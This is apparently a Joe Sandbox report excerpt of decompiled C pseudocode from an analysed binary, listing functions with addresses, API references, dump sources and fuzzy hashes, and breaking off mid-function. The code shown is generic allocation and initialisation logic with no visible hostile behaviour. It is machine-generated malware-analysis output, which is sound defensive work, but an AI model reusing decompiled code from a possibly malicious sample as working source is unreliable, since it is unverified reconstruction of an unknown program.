                                                                                                                    0x00b230c0
                                                                                                                    0x00b230c2
                                                                                                                    0x00b230c5
                                                                                                                    0x00b230c7
                                                                                                                    0x00b230cb
                                                                                                                    0x00b230d4
                                                                                                                    0x00b230d4
                                                                                                                    0x00b230cd
                                                                                                                    0x00b230cd
                                                                                                                    0x00b230cd
                                                                                                                    0x00b230d9
                                                                                                                    0x00b230dd
                                                                                                                    0x00b230e3
                                                                                                                    0x00b230e8
                                                                                                                    0x00b230f0
                                                                                                                    0x00b230fb
                                                                                                                    0x00b23103

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B22F4E
                                                                                                                      • Part of subcall function 00B23104: __EH_prolog.LIBCMT ref: 00B23109
                                                                                                                      • Part of subcall function 00B11E55: malloc.MSVCRT ref: 00B11E68
                                                                                                                      • Part of subcall function 00B11E55: _CxxThrowException.MSVCRT(?,00B90098), ref: 00B11E82
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ExceptionThrowmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3744649731-0
                                                                                                                    • Opcode ID: c3989f671208bf70d23d7f023a5efa69661d51007848c60d29ca7b6470902fa3
                                                                                                                    • Instruction ID: d55eb736b21e43a450e97061bcab69aff70ac97bc506d8eb7fa0dd786740677f
                                                                                                                    • Opcode Fuzzy Hash: c3989f671208bf70d23d7f023a5efa69661d51007848c60d29ca7b6470902fa3
                                                                                                                    • Instruction Fuzzy Hash: B151F5B1801B84CFD721DF69C1846DAFFF0BF19304F5488AED49A87662D7B4A648CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B3BECE Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 60%
                                                                                                                    			E00B3BECE(void* __ecx) {
				void* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t51;
				void* _t57;
				intOrPtr* _t58;
				intOrPtr* _t59;
				intOrPtr* _t63;
				void* _t67;
				intOrPtr _t78;
				intOrPtr _t85;
				void* _t86;
				intOrPtr* _t91;
				void* _t93;
				void* _t94;

				L00B7F140(0xb85432, _t94);
				_t91 = 0;
				_t67 = __ecx;
				 *((intOrPtr*)(_t94 - 0x14)) = 0;
				 *(_t94 - 4) = 0;
				 *((intOrPtr*)(_t94 - 0x10)) = 0;
				_t85 =  *((intOrPtr*)(_t94 + 8));
				 *(_t94 - 4) = 1;
				if( *((char*)(_t85 + 0x44)) == 0) {
					if( *((intOrPtr*)(_t85 + 0x30)) != 0) {
						goto L15;
					} else {
						_push(0x88);
						_t51 = E00B11E55();
						 *((intOrPtr*)(_t94 - 0x18)) = _t51;
						 *(_t94 - 4) = 2;
						if(_t51 != 0) {
							_t91 = E00B1AD30(_t51);
						}
						 *(_t94 - 4) = 1;
						E00B1A98B(_t94 - 0x14, _t91);
						L00B12F78(_t67 + 0x18, _t67 + 0x24);
						 *(_t91 + 0x7c) =  *(_t91 + 0x7c) & 0x00000000;
						if(L00B17860( *((intOrPtr*)(_t67 + 0x18))) != 0) {
							_t78 =  *((intOrPtr*)(_t94 + 8));
							_t91 = 0;
							_t85 = _t78;
							 *((intOrPtr*)(_t78 + 0x30)) =  *((intOrPtr*)(_t94 - 0x14));
							goto L15;
						} else {
							_t57 = L00B1729C();
							 *(_t94 - 4) =  *(_t94 - 4) & 0x00000000;
							_t93 = _t57;
							_t58 =  *((intOrPtr*)(_t94 - 0x10));
							if(_t58 != 0) {
								 *((intOrPtr*)( *_t58 + 8))(_t58);
							}
							_t59 =  *((intOrPtr*)(_t94 - 0x14));
							 *(_t94 - 4) =  *(_t94 - 4) | 0xffffffff;
							if(_t59 != 0) {
								 *((intOrPtr*)( *_t59 + 8))(_t59);
							}
							_t48 = _t93;
						}
					}
				} else {
					_push(8);
					_t63 = E00B11E55();
					if(_t63 == 0) {
						_t63 = 0;
					} else {
						 *((intOrPtr*)(_t63 + 4)) = 0;
						 *_t63 = 0xb8af84;
					}
					E00B1A98B(_t94 - 0x10, _t63);
					 *((intOrPtr*)(_t85 + 0x34)) =  *((intOrPtr*)(_t94 - 0x10));
					L15:
					_push(_t85);
					_t45 = L00B3BCCE(_t67); // executed
					 *(_t67 + 0x17) =  *(_t67 + 0x17) & 0x00000000;
					 *(_t94 - 4) =  *(_t94 - 4) & 0x00000000;
					_t86 = _t45;
					_t46 =  *((intOrPtr*)(_t94 - 0x10));
					if(_t46 != _t91) {
						 *((intOrPtr*)( *_t46 + 8))(_t46);
					}
					_t47 =  *((intOrPtr*)(_t94 - 0x14));
					 *(_t94 - 4) =  *(_t94 - 4) | 0xffffffff;
					if(_t47 != _t91) {
						 *((intOrPtr*)( *_t47 + 8))(_t47);
					}
					_t48 = _t86;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t94 - 0xc));
				return _t48;
			}



















                                                                                                                    0x00b3bed3
                                                                                                                    0x00b3bedd
                                                                                                                    0x00b3bee0
                                                                                                                    0x00b3bee2
                                                                                                                    0x00b3bee5
                                                                                                                    0x00b3bee8
                                                                                                                    0x00b3beeb
                                                                                                                    0x00b3beee
                                                                                                                    0x00b3bef6
                                                                                                                    0x00b3bf28
                                                                                                                    0x00000000
                                                                                                                    0x00b3bf2e
                                                                                                                    0x00b3bf2e
                                                                                                                    0x00b3bf33
                                                                                                                    0x00b3bf39
                                                                                                                    0x00b3bf3e
                                                                                                                    0x00b3bf42
                                                                                                                    0x00b3bf4b
                                                                                                                    0x00b3bf4b
                                                                                                                    0x00b3bf51
                                                                                                                    0x00b3bf55
                                                                                                                    0x00b3bf63
                                                                                                                    0x00b3bf6a
                                                                                                                    0x00b3bf79
                                                                                                                    0x00b3bfa8
                                                                                                                    0x00b3bfae
                                                                                                                    0x00b3bfb0
                                                                                                                    0x00b3bfb2
                                                                                                                    0x00000000
                                                                                                                    0x00b3bf7b
                                                                                                                    0x00b3bf7b
                                                                                                                    0x00b3bf80
                                                                                                                    0x00b3bf84
                                                                                                                    0x00b3bf86
                                                                                                                    0x00b3bf8b
                                                                                                                    0x00b3bf90
                                                                                                                    0x00b3bf90
                                                                                                                    0x00b3bf93
                                                                                                                    0x00b3bf96
                                                                                                                    0x00b3bf9c
                                                                                                                    0x00b3bfa1
                                                                                                                    0x00b3bfa1
                                                                                                                    0x00b3bfa4
                                                                                                                    0x00b3bfa4
                                                                                                                    0x00b3bf79
                                                                                                                    0x00b3bef8
                                                                                                                    0x00b3bef8
                                                                                                                    0x00b3befa
                                                                                                                    0x00b3bf02
                                                                                                                    0x00b3bf0f
                                                                                                                    0x00b3bf04
                                                                                                                    0x00b3bf04
                                                                                                                    0x00b3bf07
                                                                                                                    0x00b3bf07
                                                                                                                    0x00b3bf15
                                                                                                                    0x00b3bf1d
                                                                                                                    0x00b3bfb5
                                                                                                                    0x00b3bfb5
                                                                                                                    0x00b3bfb8
                                                                                                                    0x00b3bfbd
                                                                                                                    0x00b3bfc1
                                                                                                                    0x00b3bfc5
                                                                                                                    0x00b3bfc7
                                                                                                                    0x00b3bfcc
                                                                                                                    0x00b3bfd1
                                                                                                                    0x00b3bfd1
                                                                                                                    0x00b3bfd4
                                                                                                                    0x00b3bfd7
                                                                                                                    0x00b3bfdd
                                                                                                                    0x00b3bfe2
                                                                                                                    0x00b3bfe2
                                                                                                                    0x00b3bfe5
                                                                                                                    0x00b3bfe5
                                                                                                                    0x00b3bfed
                                                                                                                    0x00b3bff5

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B3BED3
                                                                                                                      • Part of subcall function 00B11E55: malloc.MSVCRT ref: 00B11E68
                                                                                                                      • Part of subcall function 00B11E55: _CxxThrowException.MSVCRT(?,00B90098), ref: 00B11E82
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionH_prologThrowmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3978722251-0
                                                                                                                    • Opcode ID: 970d4036cf531cd5431c255739621515fcb75fb605b3019d8617d0e18da8e857
                                                                                                                    • Instruction ID: d0be888c41665b8a467d07640e8f0f8a92d69a057b1454952a9c50c8d8c643cb
                                                                                                                    • Opcode Fuzzy Hash: 970d4036cf531cd5431c255739621515fcb75fb605b3019d8617d0e18da8e857
                                                                                                                    • Instruction Fuzzy Hash: 8A41BF71A042159FCB14DFA8C884BAEBBF4EF49310F2444E9F546EB286CB709E45CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B49BE6 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E00B49BE6(intOrPtr __ecx, void* __eflags) {
				intOrPtr* _t69;
				intOrPtr* _t74;
				intOrPtr _t75;
				void* _t95;

				L00B7F140(E00B864D0, _t95);
				_push(__ecx);
				 *((intOrPtr*)(_t95 - 0x10)) = __ecx;
				 *((char*)(__ecx)) = 0;
				 *((char*)(__ecx + 1)) = 0;
				 *((char*)(__ecx + 2)) = 0;
				 *((char*)(__ecx + 3)) = 0;
				 *((char*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 5)) = 0;
				 *((char*)(__ecx + 6)) = 0;
				 *((char*)(__ecx + 7)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((char*)(__ecx + 9)) = 0;
				 *((char*)(__ecx + 0xa)) = 0;
				 *((char*)(__ecx + 0xb)) = 0;
				 *((char*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0xd)) = 0;
				 *((char*)(__ecx + 0xe)) = 0;
				 *((char*)(__ecx + 0xf)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((char*)(__ecx + 0x11)) = 0;
				 *((char*)(__ecx + 0x12)) = 0;
				 *((char*)(__ecx + 0x13)) = 0;
				 *((char*)(__ecx + 0x14)) = 0;
				 *((char*)(__ecx + 0x15)) = 0;
				 *((char*)(__ecx + 0x16)) = 0;
				 *((char*)(__ecx + 0x17)) = 0;
				 *((char*)(__ecx + 0x18)) = 0;
				E00B126D9(__ecx + 0x1c);
				 *(__ecx + 0x28) =  *(__ecx + 0x28) | 0xffffffff;
				 *((intOrPtr*)(_t95 - 4)) = 0;
				L00B49D1E(__ecx + 0x2c);
				 *((char*)(_t95 - 4)) = 1;
				E00B12D90(__ecx + 0x4c);
				 *((char*)(_t95 - 4)) = 2;
				E00B12D90(__ecx + 0x5c);
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x6c)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0;
				 *((char*)(_t95 - 4)) = 4;
				L00B49D1E(__ecx + 0x74);
				 *((char*)(_t95 - 4)) = 5;
				E00B12D90(__ecx + 0x90);
				_t69 = __ecx + 0x9c;
				 *_t69 = 0;
				 *((intOrPtr*)(_t69 + 4)) = 0;
				 *((intOrPtr*)(_t69 + 8)) = 0;
				 *((char*)(_t95 - 4)) = 7;
				L00B49B58(__ecx + 0xa8);
				 *((char*)(_t95 - 4)) = 8;
				L00B49D5C(__ecx + 0xe8); // executed
				 *((char*)(_t95 - 4)) = 9;
				L00B49D3A(__ecx + 0x1f0);
				 *((char*)(_t95 - 4)) = 0xa;
				E00B12D90(__ecx + 0x208);
				_t74 = __ecx + 0x214;
				 *_t74 = 0;
				 *((intOrPtr*)(_t74 + 4)) = 0;
				 *((intOrPtr*)(_t74 + 8)) = 0;
				_t75 = 1;
				 *((intOrPtr*)(__ecx + 0x220)) = _t75;
				 *((intOrPtr*)(__ecx + 0x228)) = _t75;
				 *((intOrPtr*)(__ecx + 0x224)) = 2;
				 *((intOrPtr*)(__ecx + 0x22c)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return __ecx;
			}







                                                                                                                    0x00b49beb
                                                                                                                    0x00b49bf0
                                                                                                                    0x00b49bf7
                                                                                                                    0x00b49bfa
                                                                                                                    0x00b49bfc
                                                                                                                    0x00b49bff
                                                                                                                    0x00b49c02
                                                                                                                    0x00b49c05
                                                                                                                    0x00b49c08
                                                                                                                    0x00b49c0b
                                                                                                                    0x00b49c0e
                                                                                                                    0x00b49c11
                                                                                                                    0x00b49c14
                                                                                                                    0x00b49c17
                                                                                                                    0x00b49c1a
                                                                                                                    0x00b49c1d
                                                                                                                    0x00b49c20
                                                                                                                    0x00b49c23
                                                                                                                    0x00b49c26
                                                                                                                    0x00b49c29
                                                                                                                    0x00b49c2c
                                                                                                                    0x00b49c2f
                                                                                                                    0x00b49c32
                                                                                                                    0x00b49c35
                                                                                                                    0x00b49c38
                                                                                                                    0x00b49c3b
                                                                                                                    0x00b49c41
                                                                                                                    0x00b49c44
                                                                                                                    0x00b49c47
                                                                                                                    0x00b49c4c
                                                                                                                    0x00b49c53
                                                                                                                    0x00b49c56
                                                                                                                    0x00b49c5e
                                                                                                                    0x00b49c62
                                                                                                                    0x00b49c6a
                                                                                                                    0x00b49c6e
                                                                                                                    0x00b49c73
                                                                                                                    0x00b49c76
                                                                                                                    0x00b49c79
                                                                                                                    0x00b49c7f
                                                                                                                    0x00b49c83
                                                                                                                    0x00b49c8e
                                                                                                                    0x00b49c92
                                                                                                                    0x00b49c97
                                                                                                                    0x00b49c9d
                                                                                                                    0x00b49c9f
                                                                                                                    0x00b49ca2
                                                                                                                    0x00b49cab
                                                                                                                    0x00b49caf
                                                                                                                    0x00b49cba
                                                                                                                    0x00b49cbe
                                                                                                                    0x00b49cc9
                                                                                                                    0x00b49ccd
                                                                                                                    0x00b49cd8
                                                                                                                    0x00b49cdc
                                                                                                                    0x00b49ce1
                                                                                                                    0x00b49ce7
                                                                                                                    0x00b49ce9
                                                                                                                    0x00b49cf1
                                                                                                                    0x00b49cf4
                                                                                                                    0x00b49cf5
                                                                                                                    0x00b49cfb
                                                                                                                    0x00b49d01
                                                                                                                    0x00b49d0b
                                                                                                                    0x00b49d15
                                                                                                                    0x00b49d1d

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B49BEB
                                                                                                                      • Part of subcall function 00B49B58: __EH_prolog.LIBCMT ref: 00B49B5D
                                                                                                                      • Part of subcall function 00B49D5C: __EH_prolog.LIBCMT ref: 00B49D61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 5b7bf9250d59710d4182b0712597767596f697f0c6088b3c9ede32bc126bb0ae
                                                                                                                    • Instruction ID: d26ce662214c7e651bdb67689e88ad0e156fbe0db3501d5f98e8a5bde4c5f275
                                                                                                                    • Opcode Fuzzy Hash: 5b7bf9250d59710d4182b0712597767596f697f0c6088b3c9ede32bc126bb0ae
                                                                                                                    • Instruction Fuzzy Hash: 9941D97244ABC0DEC322DF7880556CAFFE06F26204F98C99ED4EA43752D670A608C766
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B2F3F7 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 84%
                                                                                                                    			E00B2F3F7(intOrPtr* __ecx, intOrPtr __edx) {
				void* __ebx;
				void* _t39;
				signed int _t42;
				void* _t43;
				signed int _t46;
				signed int _t48;
				intOrPtr* _t49;
				intOrPtr _t68;
				void* _t69;
				void* _t70;

				_t49 = __ecx;
				L00B7F140(E00B845B0, _t70);
				_push(_t46);
				 *((intOrPtr*)(_t70 - 0x1c)) = __edx;
				 *((intOrPtr*)(_t70 - 0x18)) = __ecx;
				 *(_t70 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 4)) <= 0) {
					L12:
					L00B2EF63( *((intOrPtr*)(_t70 + 0xc)));
					_t39 = E00B3021C( *((intOrPtr*)(_t70 + 0xc)));
					L13:
					 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
					return _t39;
				}
				_t48 = _t46 | 0xffffffff;
				while(1) {
					_t68 =  *((intOrPtr*)( *_t49 +  *(_t70 - 0x10) * 4));
					if( *((intOrPtr*)(_t68 + 4)) != 0) {
						 *(_t70 - 0x14) = L00B2EF85( *((intOrPtr*)(_t70 + 0xc)), _t70, _t48, _t48, _t68);
					} else {
						 *(_t70 - 0x14) = _t48;
					}
					_t42 = _t48;
					if( *((intOrPtr*)(_t70 - 0x1c)) != 2) {
						_t55 =  *((intOrPtr*)(_t70 + 8));
						if( *((intOrPtr*)( *((intOrPtr*)(_t70 + 8)) + 4)) != 0) {
							_t42 = L00B2EF85( *((intOrPtr*)(_t70 + 0xc)), _t70, _t48, _t48, _t55);
						}
					} else {
						_t42 =  *(_t70 - 0x14);
					}
					 *((intOrPtr*)(_t70 - 0x28)) = 0;
					 *((intOrPtr*)(_t70 - 0x24)) = 0;
					 *((intOrPtr*)(_t70 - 0x20)) = 0;
					_push(0);
					_push( *((intOrPtr*)(_t70 + 0xc)));
					 *(_t70 - 4) = 0;
					_push(_t70 - 0x28);
					_push(_t68);
					_push(_t42);
					_t25 = _t68 + 0xc; // 0xc, executed
					_t43 = L00B2F4CC(_t25,  *(_t70 - 0x14)); // executed
					_t69 = _t43;
					 *(_t70 - 4) = _t48;
					L00B41B84(_t48, _t70 - 0x28);
					if(_t69 != 0) {
						break;
					}
					 *(_t70 - 0x10) =  *(_t70 - 0x10) + 1;
					if( *(_t70 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t70 - 0x18)) + 4))) {
						_t49 =  *((intOrPtr*)(_t70 - 0x18));
						continue;
					}
					goto L12;
				}
				_t39 = _t69;
				goto L13;
			}













                                                                                                                    0x00b2f3f7
                                                                                                                    0x00b2f3fc
                                                                                                                    0x00b2f404
                                                                                                                    0x00b2f40c
                                                                                                                    0x00b2f40f
                                                                                                                    0x00b2f412
                                                                                                                    0x00b2f415
                                                                                                                    0x00b2f4a7
                                                                                                                    0x00b2f4aa
                                                                                                                    0x00b2f4b2
                                                                                                                    0x00b2f4b7
                                                                                                                    0x00b2f4bd
                                                                                                                    0x00b2f4c5
                                                                                                                    0x00b2f4c5
                                                                                                                    0x00b2f41b
                                                                                                                    0x00b2f423
                                                                                                                    0x00b2f428
                                                                                                                    0x00b2f42e
                                                                                                                    0x00b2f440
                                                                                                                    0x00b2f430
                                                                                                                    0x00b2f430
                                                                                                                    0x00b2f430
                                                                                                                    0x00b2f447
                                                                                                                    0x00b2f449
                                                                                                                    0x00b2f450
                                                                                                                    0x00b2f456
                                                                                                                    0x00b2f45e
                                                                                                                    0x00b2f45e
                                                                                                                    0x00b2f44b
                                                                                                                    0x00b2f44b
                                                                                                                    0x00b2f44b
                                                                                                                    0x00b2f463
                                                                                                                    0x00b2f466
                                                                                                                    0x00b2f469
                                                                                                                    0x00b2f46f
                                                                                                                    0x00b2f470
                                                                                                                    0x00b2f476
                                                                                                                    0x00b2f479
                                                                                                                    0x00b2f47a
                                                                                                                    0x00b2f47b
                                                                                                                    0x00b2f47c
                                                                                                                    0x00b2f47f
                                                                                                                    0x00b2f487
                                                                                                                    0x00b2f489
                                                                                                                    0x00b2f48c
                                                                                                                    0x00b2f493
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2f495
                                                                                                                    0x00b2f4a1
                                                                                                                    0x00b2f420
                                                                                                                    0x00000000
                                                                                                                    0x00b2f420
                                                                                                                    0x00000000
                                                                                                                    0x00b2f4a1
                                                                                                                    0x00b2f4c8
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 965a169ceef67f3ab5b52a0db049c0aada807e9e08e8ec5d4909c805f5d2c0de
                                                                                                                    • Instruction ID: 19657ef7b8453b158cb6be4b00a8fd272857aa07ccabb72fb30b6cf5868f1d31
                                                                                                                    • Opcode Fuzzy Hash: 965a169ceef67f3ab5b52a0db049c0aada807e9e08e8ec5d4909c805f5d2c0de
                                                                                                                    • Instruction Fuzzy Hash: BA311C71D0011A9BCB14EF95E9918BFBBF5FF84364B2081B9E42967341C7709E00CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B386C4 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 71%
                                                                                                                    			E00B386C4() {
				void* __edi;
				void* _t24;
				signed int _t32;
				signed int _t36;
				intOrPtr* _t40;
				signed int _t47;
				intOrPtr* _t50;
				void* _t52;

				L00B7F140(0xb85248, _t52);
				_t36 =  *(_t52 + 0xc);
				_t50 =  *((intOrPtr*)(_t52 + 8));
				_t47 =  *(_t52 + 0x10);
				_push(_t47);
				_push(_t36); // executed
				_t24 = E00B38759( *_t50); // executed
				if(_t24 != 0) {
					L10:
					 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
					return _t24;
				}
				_t40 =  *_t47;
				if(_t40 == 0) {
					L9:
					_t24 = 0;
					goto L10;
				}
				if(( *( *( *((intOrPtr*)( *_t50 + 8)) + _t36 * 4)) >> 0x00000009 & 0x00000001) != 0) {
					 *(_t52 + 0x10) =  *(_t52 + 0x10) & 0x00000000;
					 *(_t52 - 4) =  *(_t52 - 4) & 0x00000000;
					 *((intOrPtr*)( *_t40))(_t40, 0xb8d190, _t52 + 0x10);
					_t32 =  *(_t52 + 0x10);
					if(_t32 != 0) {
						 *((intOrPtr*)( *_t32 + 0xc))(_t32, 1);
						_t32 =  *(_t52 + 0x10);
					}
					 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
					if(_t32 != 0) {
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
				}
				_t44 =  *((intOrPtr*)(_t50 + 0x40));
				if( *((intOrPtr*)(_t50 + 0x40)) != 0) {
					_t24 = L00B3DCF6(_t44, _t47);
					if(_t24 != 0) {
						goto L10;
					}
				}
			}











                                                                                                                    0x00b386c9
                                                                                                                    0x00b386cf
                                                                                                                    0x00b386d3
                                                                                                                    0x00b386d7
                                                                                                                    0x00b386dc
                                                                                                                    0x00b386dd
                                                                                                                    0x00b386de
                                                                                                                    0x00b386e5
                                                                                                                    0x00b38748
                                                                                                                    0x00b3874e
                                                                                                                    0x00b38756
                                                                                                                    0x00b38756
                                                                                                                    0x00b386e7
                                                                                                                    0x00b386eb
                                                                                                                    0x00b38746
                                                                                                                    0x00b38746
                                                                                                                    0x00000000
                                                                                                                    0x00b38746
                                                                                                                    0x00b386fc
                                                                                                                    0x00b386fe
                                                                                                                    0x00b38704
                                                                                                                    0x00b38712
                                                                                                                    0x00b38714
                                                                                                                    0x00b38719
                                                                                                                    0x00b38720
                                                                                                                    0x00b38723
                                                                                                                    0x00b38723
                                                                                                                    0x00b38726
                                                                                                                    0x00b3872c
                                                                                                                    0x00b38731
                                                                                                                    0x00b38731
                                                                                                                    0x00b3872c
                                                                                                                    0x00b38734
                                                                                                                    0x00b38739
                                                                                                                    0x00b3873d
                                                                                                                    0x00b38744
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b38744

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B386C9
                                                                                                                      • Part of subcall function 00B38759: __EH_prolog.LIBCMT ref: 00B3875E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 0d14995063b1ea309c399d92e7120d545b2057afb9c11c2ab549917329cfe07c
                                                                                                                    • Instruction ID: 86d4aea81e706a46b66682ca536b955ae0fa6177a814a927dd4172cd1564b836
                                                                                                                    • Opcode Fuzzy Hash: 0d14995063b1ea309c399d92e7120d545b2057afb9c11c2ab549917329cfe07c
                                                                                                                    • Instruction Fuzzy Hash: 9C112339600305DBDB24DF69C884BAAB3EAEF99310F248498F955DB290DB71ED01CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B135A7 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E00B135A7(intOrPtr* __ecx, intOrPtr __edx, void* __eflags) {
				void* _t23;
				signed int _t32;
				intOrPtr _t46;
				intOrPtr* _t49;
				void* _t51;

				L00B7F140(E00B82B98, _t51);
				_t49 = __ecx;
				 *((intOrPtr*)(_t51 - 0x10)) = __edx;
				_t23 = E00B36CB9(__edx);
				_t46 =  *((intOrPtr*)(__ecx + 4));
				_t32 = 0;
				if(_t46 == 0) {
					L10:
					 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
					return _t23;
				}
				_t24 = E00B12D90(_t51 - 0x1c);
				 *((intOrPtr*)(_t51 - 4)) = 0;
				if(_t46 <= 0) {
					L7:
					if( *(_t51 - 0x18) != 0) {
						E00B56B33( *((intOrPtr*)(_t51 - 0x10)));
						_push(_t51 - 0x1c);
						_t24 = E00B11524( *((intOrPtr*)(_t51 - 0x10)));
					}
					_t23 = E00B11E89(_t24,  *(_t51 - 0x1c));
					goto L10;
				} else {
					goto L2;
				}
				do {
					L2:
					_t24 =  *((intOrPtr*)( *_t49 + _t32 * 2));
					if( *((intOrPtr*)( *_t49 + _t32 * 2)) != 0x20) {
						_t24 = L00B11089(_t51 - 0x1c, _t24);
					} else {
						if( *(_t51 - 0x18) != 0) {
							E00B56B33( *((intOrPtr*)(_t51 - 0x10)));
							_push(_t51 - 0x1c); // executed
							E00B11524( *((intOrPtr*)(_t51 - 0x10))); // executed
							_t24 =  *(_t51 - 0x1c);
